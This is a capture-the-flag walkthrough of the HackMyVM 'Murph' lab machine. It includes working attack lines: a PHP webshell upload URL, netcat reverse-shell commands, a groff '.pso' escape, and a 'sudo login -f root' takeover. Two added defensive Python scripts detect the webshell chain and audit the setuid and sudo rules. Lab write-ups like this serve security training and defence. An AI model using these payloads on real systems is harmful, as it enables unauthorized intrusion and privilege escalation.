NOTES ABOUT Murph

[ 2022-10-10 ] [ HackMyVM / Murph ]

Status: Rooted
Skills: Port Scanning, Fuzzing, PHP Backdoor, RCE, Reverse Shell, SIGNALS
Tools: nmap, nc, gobuster, groff, login

PORT SCANNING

$ nmap -T4 -sCSV -p- 10.0.2.26

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
| 3072 b2:c9:f2:72:7a:ad:71:52:df:9b:31:b1:a9:87:dc:54 (RSA)
| 256 e9:73:af:55:81:50:2b:13:4c:fe:92:31:c4:b7:ae:4d (ECDSA)
|_ 256 ad:c1:58:71:0e:fc:c8:9e:86:9c:c7:3f:85:be:2d:c8 (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.18.0

GETTING IN

$ gobuster -q dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,htm,php,txt,xml -u http://10.0.2.26
/index.html (Status: 200) [Size: 266]
/uploads (Status: 301) [Size: 169] [--> http://10.0.2.26/uploads/]

PAYLOAD:

http://10.0.2.26/saveit.php?filename=cmd.phtml&content=%3C%3FPHP+echo+exec%28%24_GET%5B%27c%27%5D%29%3B+%3F%3E
http://10.0.2.26/uploads/cmd.phtml?c=nc%20-c%20/bin/bash%2010.0.2.15%2080

REVERSE SHELL:

$ nc -lvnp 80
listening on [any] 80 ...
connect to [10.0.2.15] from (UNKNOWN) [10.0.2.26] 45770
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@murph:~/html/uploads$
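Defender's view of the chain above, as an added example that is not part of the original notes: a small Python script that scans nginx access-log lines for the two stages, the saveit.php write of a file with an executable extension (or PHP content) and the later hit on a script under /uploads/ carrying a command-like parameter. The log lines, the "combined" log format, the extension list and the command keywords are assumptions built from the two URLs in the notes.

```python
"""Access-log detection for the saveit.php -> /uploads/*.phtml chain.

Added example, not part of the original notes. Assumes nginx's default
"combined" log format; the sample lines are constructed from the two
payload URLs in the write-up.
"""
import re
from urllib.parse import parse_qs, urlparse

# Constructed access-log lines mirroring the notes (client 10.0.2.15).
SAMPLE_LOG = """\
10.0.2.15 - - [10/Oct/2022:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 266 "-" "Mozilla/5.0"
10.0.2.15 - - [10/Oct/2022:12:00:05 +0000] "GET /saveit.php?filename=cmd.phtml&content=%3C%3FPHP+echo+exec%28%24_GET%5B%27c%27%5D%29%3B+%3F%3E HTTP/1.1" 200 12 "-" "Mozilla/5.0"
10.0.2.15 - - [10/Oct/2022:12:00:09 +0000] "GET /uploads/cmd.phtml?c=nc%20-c%20/bin/bash%2010.0.2.15%2080 HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.0.2.15 - - [10/Oct/2022:12:00:20 +0000] "GET /uploads/photo.jpg HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Extensions a typical nginx + php-fpm setup hands to the interpreter (assumed list).
EXEC_EXTS = (".php", ".phtml", ".phar", ".php5", ".php7")
PHP_TAG = re.compile(r"<\?(php|=)", re.IGNORECASE)
CMD_HINT = re.compile(r"\b(nc|bash|sh|python3?|perl|curl|wget)\b")


def analyze(log_text):
    """Return (timestamp, client, reason) alerts for the two attack stages."""
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlparse(m["target"])
        params = {k: v[0] for k, v in parse_qs(url.query).items()}  # %XX and '+' decoded
        path = url.path.lower()
        # Stage 1: the write primitive. saveit.php asked to store a file with an
        # executable extension, or with content carrying a PHP open tag.
        if path.endswith("/saveit.php"):
            fname = params.get("filename", "")
            if fname.lower().endswith(EXEC_EXTS) or PHP_TAG.search(params.get("content", "")):
                alerts.append((m["ts"], m["ip"], f"webshell write via saveit.php: {fname}"))
        # Stage 2: execution. A script under /uploads/ was actually served (not
        # refused), and one of its parameters looks like a command line.
        elif path.startswith("/uploads/") and path.endswith(EXEC_EXTS):
            if m["status"] not in ("403", "404"):
                cmd = next((v for v in params.values() if CMD_HINT.search(v)), None)
                reason = f"script executed under /uploads: {path}"
                if cmd:
                    reason += f", command-like parameter: {cmd!r}"
                alerts.append((m["ts"], m["ip"], reason))
    return alerts


if __name__ == "__main__":
    for ts, ip, reason in analyze(SAMPLE_LOG):
        print(f"[{ts}] {ip}: {reason}")
```

Point analyze() at the real access.log to run it outside the sample. The server-side fix is to keep uploads from reaching PHP at all: an nginx location for /uploads/ that returns 403 for .php/.phtml requests ahead of the generic PHP handler, and a saveit.php that forces a non-executable extension and writes outside the web root.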

ELEVATING PRIVILEGES

www-data@murph:~/html/uploads$ find / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null

-rwsr-sr-x 1 root www-data 16896 May 31 10:28 /opt/murph
[...]

www-data@murph:~/html/uploads$ /opt/murph
/opt/murph
Waiting SIGUSR1....
^C


www-data@murph:~/html/uploads$ /opt/murph&
[1] 668
www-data@murph:~/html/uploads$ Waiting SIGUSR1

www-data@murph:~/html/uploads$ kill -SIGUSR1 668
www-data@murph:~/html/uploads$ fg

jen@murph:~/html/uploads$ id
uid=1000(jen) gid=33(www-data) groups=33(www-data)

jen@murph:/home/jen$ cat user.txt
****************

jen@murph:/home/jen$ sudo -l
[...]
User jen may run the following commands on murph:
(pat) NOPASSWD: /usr/bin/groff

groff [ exploit-db/exploits/19430 ]

jen@murph:~/html/uploads$ sudo -u pat /usr/bin/groff -U
sudo -u pat /usr/bin/groff -U
.pso nc -c /bin/bash 10.0.2.15 443

AND A NEW REVERSE SHELL...

$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.0.2.15] from (UNKNOWN) [10.0.2.26] 55980
id
uid=1001(pat) gid=1001(pat) groups=1001(pat)

python3 -c "import pty;pty.spawn('/bin/bash')"
pat@murph:/var/www/html/uploads$ ls -la /home/pat

pat@murph:/var/www/html/uploads$ sudo -l
[...]
(root) NOPASSWD: /usr/bin/login

pat@murph:/var/www/html/uploads$ sudo -u root login -f root

root@murph:~# cat root.txt
****************
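Added audit example covering the two escalation paths used in the notes, the unusual setuid/setgid binary in /opt and the NOPASSWD sudo rules for groff (jen -> pat) and login (pat -> root). This is not code from the original write-up: the setuid listing, the sudo -l style lines, the setuid baseline and the list of shell-capable binaries are all constructed for the example.

```python
"""Privilege-escalation surface audit.

Added example, not part of the original notes. Parses a setuid listing and
sudo -l style rules and flags the conditions that let the chain above work.
"""
import re

# Constructed excerpt of `find / -perm -4000 -type f -exec ls -al {} \;`.
SUID_LISTING = """\
-rwsr-xr-x 1 root root 71912 Jan 20  2022 /usr/bin/su
-rwsr-xr-x 1 root root 63960 Feb  7  2020 /usr/bin/passwd
-rwsr-xr-x 1 root root 182600 Jan 14  2021 /usr/bin/sudo
-rwsr-sr-x 1 root www-data 16896 May 31 10:28 /opt/murph
"""

# Constructed `sudo -l` style output for the two users in the notes.
SUDO_RULES = """\
User jen may run the following commands on murph:
    (pat) NOPASSWD: /usr/bin/groff
User pat may run the following commands on murph:
    (root) NOPASSWD: /usr/bin/login
    (root) /usr/bin/id
"""

# Constructed, deliberately short baseline of setuid paths a Debian install
# is expected to carry; a real audit diffs against package file lists.
SUID_BASELINE = {
    "/usr/bin/su", "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/mount",
    "/usr/bin/umount", "/usr/bin/newgrp", "/usr/bin/chsh", "/usr/bin/chfn",
}

# Binaries that, run through sudo, end up executing caller-chosen input
# or opening a session. groff and login are the two from these notes.
SHELL_CAPABLE = {
    "groff": "processes directives from its input",
    "login": "-f opens a session without a password",
    "bash": "is a shell", "sh": "is a shell", "su": "switches user",
}

LS_RE = re.compile(
    r"^(?P<mode>[-dlrwxsStT]{10})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)\s+\d+"
    r"\s+\S+\s+\d+\s+\S+\s+(?P<path>/\S+)$"
)
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>/\S+)")


def audit_suid(listing, baseline=SUID_BASELINE):
    """Return (path, reason) pairs for setuid files that deserve a look."""
    findings = []
    for line in listing.splitlines():
        m = LS_RE.match(line)
        if not m:
            continue
        reasons = []
        if m["path"] not in baseline:
            reasons.append("not in setuid baseline")
        if m["mode"][6] in "sS":          # group execute slot carries the setgid bit
            reasons.append(f"also setgid to {m['group']}")
        if "www-data" in (m["owner"], m["group"]):
            reasons.append("owned by or grouped to the web server account")
        if reasons:
            findings.append((m["path"], "; ".join(reasons)))
    return findings


def audit_sudo(rules_text):
    """Return (user, runas, command, nopasswd, why) for risky sudo rules."""
    findings, user = [], None
    for line in rules_text.splitlines():
        um = re.match(r"^User (\S+) may run", line)
        if um:
            user = um.group(1)
            continue
        rm = RULE_RE.match(line)
        if not rm or user is None:
            continue
        binary = rm["cmd"].rsplit("/", 1)[-1]
        if binary in SHELL_CAPABLE:
            findings.append((user, rm["runas"], rm["cmd"],
                             "NOPASSWD" in rm["tags"], SHELL_CAPABLE[binary]))
    return findings


if __name__ == "__main__":
    for path, why in audit_suid(SUID_LISTING):
        print(f"SUID  {path}: {why}")
    for user, runas, cmd, nopw, why in audit_sudo(SUDO_RULES):
        tag = "NOPASSWD " if nopw else ""
        print(f"SUDO  {user} -> ({runas}) {tag}{cmd}: {why}")
```

On this box the three findings map directly onto the notes: a setuid root, setgid www-data binary outside the package baseline (the SIGUSR1 step), and two NOPASSWD rules for programs that read commands from their input or open a session. The fix is to strip the setuid/setgid bits from /opt/murph and replace the blanket sudo rules with wrappers that take no user-controlled input.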

root@murph:~# init 0
